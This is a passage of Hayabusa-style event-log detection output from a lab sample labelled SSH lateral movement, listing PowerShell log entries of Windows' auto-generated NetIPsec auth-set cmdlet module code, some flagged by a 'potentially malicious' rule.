$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 
'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ 
} { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.518 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.521 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.523 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
